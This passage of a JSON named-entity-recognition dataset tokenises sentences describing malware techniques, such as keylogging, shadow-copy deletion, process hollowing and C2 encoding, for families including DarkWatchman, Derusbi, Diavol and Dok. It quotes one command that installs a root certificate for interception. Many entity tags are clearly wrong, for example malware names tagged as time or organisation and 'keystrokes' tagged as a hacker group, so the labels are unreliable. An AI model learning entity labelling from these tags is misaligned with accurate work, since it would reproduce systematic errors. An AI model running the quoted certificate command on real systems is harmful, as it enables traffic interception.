"B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "been", "delivered", "as", "compressed", "RAR", "payloads", "in", "ZIP", "files", "to", "victims." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "been", "observed", "deleting", "its", "original", "launcher", "after", "installation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "the", "ability", "to", "enumerate", "file", "and", "folder", "names." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "store", "configuration", "strings,", "keylogger,", "and", "output", "of", "components", "in", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "uninstall", "malicious", "components", "from", "the", "Registry,", "stop", "processes,", "and", "clear", "the", "browser", "history." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "delete", "shadow", "volumes", "using", "<code>vssadmin.exe</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkWatchman", "uses", "JavaScript", "to", "perform", "its", "core", "functionalities." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "track", "key", "presses", "with", "a", "keylogger", "module." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "stage", "local", "data", "in", "the", "Windows", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "used", "an", "icon", "mimicking", "a", "text", "file", "to", "mask", "a", "malicious", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "modify", "Registry", "values", "to", "store", "configuration", "strings,", "keylogger,", "and", "output", "of", "components." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "list", "signed", "PnP", "drivers", "for", "smartcard", "readers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "execute", "PowerShell", "commands", "and", "has", "used", "PowerShell", "to", "execute", "a", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "query", "the", "Registry", "to", "determine", "if", "it", "has", "already", "been", "installed", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "created", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "search", "for", "anti-virus", "products", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "load", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "been", "delivered", "via", "spearphishing", "emails", "that", "contain", "a", "malicious", "zip", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "DarkWatchman", "encodes", "data", "using", "hexadecimal", "representation", "before", "sending", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "collect", "the", "OS", "version,", "system", "architecture,", "and", "computer", "name." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "identity", "the", "OS", "locale", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "collected", "the", "username", "from", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "collect", "time", "zone", "information", "and", "system", "`UPTIME`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DarkWatchman", "uses", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "use", "`cmd.exe`", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "use", "WMI", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Daserf", "hides", "collected", "data", "in", "password-protected", ".rar", "archives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Daserf", "hides", "collected", "data", "in", "password-protected", ".rar", "archives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Daserf", "samples", "were", "signed", "with", "a", "stolen", "digital", "certificate." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Analysis", "of", "Daserf", "has", "shown", "that", "it", "regularly", "undergoes", "technical", "improvements", "to", "evade", "anti-virus", "detection." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Daserf", "can", "download", "remote", "files." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Daserf", "can", "log", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Daserf", "leverages", "Mimikatz", "and", "Windows", "Credential", "Editor", "to", "steal", "credentials." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "I-Tool", "B-SecTeam", "B-Tool", "O", "I-Purp", "O" ] }, { "tokens": [ "Daserf", "uses", "file", "and", "folder", "names", "related", "to", "legitimate", "programs", "in", "order", "to", "blend", "in,", "such", "as", "HP,", "Intel,", "Adobe,", "and", "perflogs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Daserf", "uses", "encrypted", "Windows", "APIs", "and", "also", "encrypts", "data", "using", "the", "alternative", "base64+RC4", "or", "the", "Caesar", "cipher." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "Daserf", "can", "take", "screenshots." ], "ner_tags": [ "B-Idus", "O", "B-Features", "B-HackOrg" ] }, { "tokens": [ "A", "version", "of", "Daserf", "uses", "the", "MPRESS", "packer." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Daserf", "uses", "custom", "base64", "encoding", "to", "obfuscate", "HTTP", "traffic." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Daserf", "can", "use", "steganography", "to", "hide", "malicious", "code", "downloaded", "to", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Daserf", "uses", "RC4", "encryption", "to", "obfuscate", "HTTP", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Daserf", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Daserf", "can", "execute", "shell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "DealersChoice", "leverages", "vulnerable", "versions", "of", "Flash", "to", "perform", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DealersChoice", "uses", "HTTP", "for", "communication", "with", "the", "C2", "server." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DealersChoice", "makes", "modifications", "to", "open-source", "scripts", "from", "GitHub", "and", "executes", "them", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "compressed", "collected", "data", "using", "zlib." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Denis", "has", "encoded", "its", "PowerShell", "commands", "in", "Base64." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Denis", "exploits", "a", "security", "vulnerability", "to", "load", "a", "fake", "DLL", "and", "execute", "its", "code." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "has", "used", "DNS", "tunneling", "for", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Denis", "will", "decrypt", "important", "strings", "used", "for", "C&C", "communication." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "has", "a", "command", "to", "delete", "files", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "has", "several", "commands", "to", "search", "directories", "for", "files." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "replaces", "the", "nonexistent", "Windows", "DLL", "\"msfte.dll\"", "with", "its", "own", "malicious", "version,", "which", "is", "loaded", "by", "the", "SearchIndexer.exe", "and", "SearchProtocolHost.exe." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Denis", "deploys", "additional", "backdoors", "and", "hacking", "tools", "to", "the", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "used", "the", "<code>IsDebuggerPresent</code>,", "<code>OutputDebugString</code>,", "and", "<code>SetLastError</code>", "APIs", "to", "avoid", "debugging.", "Denis", "used", "<code>GetProcAddress</code>", "and", "<code>LoadLibrary</code>", "to", "dynamically", "resolve", "APIs.", "Denis", "also", "used", "the", "<code>Wow64SetThreadContext</code>", "API", "as", "part", "of", "a", "process", "hollowing", "process." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "obfuscates", "its", "code", "and", "encrypts", "the", "API", "names." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "has", "a", "version", "written", "in", "PowerShell." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "performed", "process", "hollowing", "through", "the", "API", "calls", "CreateRemoteThread,", "ResumeThread,", "and", "Wow64SetThreadContext." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Denis", "queries", "the", "Registry", "for", "keys", "and", "values." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "encodes", "the", "data", "sent", "to", "the", "server", "in", "Base64." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "ran", "multiple", "system", "checks,", "looking", "for", "processor", "and", "register", "characteristics,", "to", "evade", "emulation", "and", "analysis." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Denis", "collects", "OS", "information", "and", "the", "computer", "name", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-HackOrg", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "uses", "<code>ipconfig</code>", "to", "gather", "the", "IP", "address", "from", "the", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Denis", "enumerates", "and", "collects", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Denis", "can", "launch", "a", "remote", "shell", "to", "execute", "arbitrary", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "performing", "audio", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Derusbi", "injects", "itself", "into", "the", "secure", "shell", "(SSH)", "process." ], "ner_tags": [ "B-Way", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "uses", "a", "backup", "communication", "method", "with", "an", "HTTP", "beacon." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "deleting", "files.", "It", "has", "been", "observed", "loading", "a", "Linux", "Kernel", "Module", "(LKM)", "and", "then", "deleting", "it", "from", "the", "hard", "disk", "as", "well", "as", "overwriting", "the", "data", "with", "null", "bytes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "obtaining", "directory,", "file,", "and", "drive", "listings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "logging", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Derusbi", "binds", "to", "a", "raw", "socket", "on", "a", "random", "source", "port", "between", "31800", "and", "31900", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "has", "used", "unencrypted", "HTTP", "on", "port", "443", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "collects", "current", "and", "parent", "process", "IDs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "enumerating", "Registry", "keys", "and", "values." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "variants", "have", "been", "seen", "that", "use", "Registry", "persistence", "to", "proxy", "execution", "through", "regsvr32.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "performing", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "obfuscates", "C2", "traffic", "with", "variable", "4-byte", "XOR", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Derusbi", "gathers", "the", "name", "of", "the", "local", "host,", "version", "of", "GNU", "Compiler", "Collection", "(GCC),", "and", "the", "system", "information", "about", "the", "CPU,", "machine,", "and", "operating", "system." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Linux", "version", "of", "Derusbi", "checks", "if", "the", "victim", "user", "ID", "is", "anything", "other", "than", "zero", "(normally", "used", "for", "root),", "and", "the", "malware", "will", "not", "execute", "if", "it", "does", "not", "have", "root", "privileges.", "Derusbi", "also", "gathers", "the", "username", "of", "the", "victim." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Derusbi", "malware", "supports", "timestomping." ], "ner_tags": [ "O", "B-SamFile", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "creating", "a", "remote", "Bash", "shell", "and", "executing", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Derusbi", "is", "capable", "of", "capturing", "video." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Diavol", "can", "delete", "specified", "files", "from", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "encrypted", "files", "using", "an", "RSA", "key", "though", "the", "`CryptEncrypt`", "API", "and", "has", "appended", "filenames", "with", "\".lock64\"." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Diavol", "can", "attempt", "to", "stop", "security", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "a", "command", "to", "traverse", "the", "files", "and", "directories", "in", "a", "given", "path." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "receive", "configuration", "updates", "and", "additional", "payloads", "including", "wscpy.exe", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Diavol", "can", "delete", "shadow", "copies", "using", "the", "`IVssBackupComponents`", "COM", "object", "to", "call", "the", "`DeleteSnapshots`", "method." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "encryption,", "Diavol", "will", "capture", "the", "desktop", "background", "window,", "set", "the", "background", "color", "to", "black,", "and", "change", "the", "desktop", "wallpaper", "to", "a", "newly", "created", "bitmap", "image", "with", "the", "text", "“All", "your", "files", "are", "encrypted!", "For", "more", "information", "see", "“README-FOR-DECRYPT.txt\"." ], "ner_tags": [ "O", "O", "B-Time", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Diavol", "has", "used", "several", "API", "calls", "like", "`GetLogicalDriveStrings`,", "`SleepEx`,", "`SystemParametersInfoAPI`,", "`CryptEncrypt`,", "and", "others", "to", "execute", "parts", "of", "its", "attack." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "a", "`ENMDSKS`", "command", "to", "enumerates", "available", "network", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "Base64", "encoded", "the", "RSA", "public", "key", "used", "for", "encrypting", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "used", "`CreateToolhelp32Snapshot`,", "`Process32First`,", "and", "`Process32Next`", "API", "calls", "to", "enumerate", "the", "running", "processes", "in", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "use", "the", "ARP", "table", "to", "find", "remote", "hosts", "to", "scan." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "spread", "throughout", "a", "network", "via", "SMB", "prior", "to", "encryption." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Diavol", "will", "terminate", "services", "using", "the", "Service", "Control", "Manager", "(SCM)", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Diavol", "has", "obfuscated", "its", "main", "code", "routines", "within", "bitmap", "images", "as", "part", "of", "its", "anti-analysis", "techniques." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "collect", "the", "computer", "name", "and", "OS", "version", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "enumerate", "victims'", "local", "and", "external", "IPs", "when", "registering", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Diavol", "has", "used", "HTTP", "GET", "and", "POST", "requests", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dipsind", "can", "download", "remote", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Dipsind", "can", "be", "configured", "to", "only", "run", "during", "normal", "working", "hours,", "which", "would", "make", "its", "communications", "harder", "to", "distinguish", "from", "normal", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dipsind", "encodes", "C2", "traffic", "with", "base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dipsind", "encrypts", "C2", "data", "with", "AES256", "in", "ECB", "mode." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Dipsind", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Dipsind", "can", "spawn", "remote", "shells." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Dipsind", "variant", "registers", "as", "a", "Winlogon", "Event", "Notify", "DLL", "to", "establish", "persistence." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disco", "has", "achieved", "initial", "access", "and", "execution", "through", "content", "injection", "into", "DNS,", "HTTP,", "and", "SMB", "replies", "to", "targeted", "hosts", "that", "redirect", "them", "to", "download", "malicious", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disco", "can", "use", "SMB", "to", "transfer", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "O" ] }, { "tokens": [ "Disco", "can", "download", "files", "to", "targeted", "systems", "via", "SMB." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Disco", "has", "been", "executed", "through", "inducing", "user", "interaction", "with", "malicious", ".zip", "and", ".msi", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Disco", "can", "create", "a", "scheduled", "task", "to", "run", "every", "minute", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "direct", "queries", "to", "custom", "DNS", "servers", "and", "return", "C2", "commands", "using", "TXT", "records." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "upload", "files", "from", "infected", "machines", "after", "receiving", "a", "command", "with", "`uploaddd`", "in", "the", "string." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "exfiltrate", "collected", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "download", "files", "to", "compromised", "systems", "after", "receiving", "a", "command", "with", "the", "string", "`downloaddd`." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "has", "lured", "victims", "into", "opening", "macro-enabled", "Word", "documents", "for", "execution." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "write", "itself", "to", "the", "Startup", "folder", "to", "gain", "persistence." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "Base64", "encode", "data", "sent", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "use", "the", "Windows", "user", "name", "to", "create", "a", "unique", "identification", "for", "infected", "users", "and", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DnsSystem", "can", "use", "`cmd.exe`", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Dok", "proxies", "web", "traffic", "to", "potentially", "monitor", "and", "alter", "victim", "HTTP(S)", "traffic." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "uses", "AppleScript", "to", "create", "a", "login", "item", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "exfiltrates", "logs", "of", "its", "execution", "stored", "in", "the", "<code>/tmp</code>", "folder", "over", "FTP", "using", "the", "<code>curl</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "prompts", "the", "user", "for", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "installs", "a", "root", "certificate", "to", "aid", "in", "Adversary-in-the-Middle", "actions", "using", "the", "command", "<code>add-trusted-cert", "-d", "-r", "trustRoot", "-k", "/Library/Keychains/System.keychain", "/tmp/filename</code>." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "installs", "two", 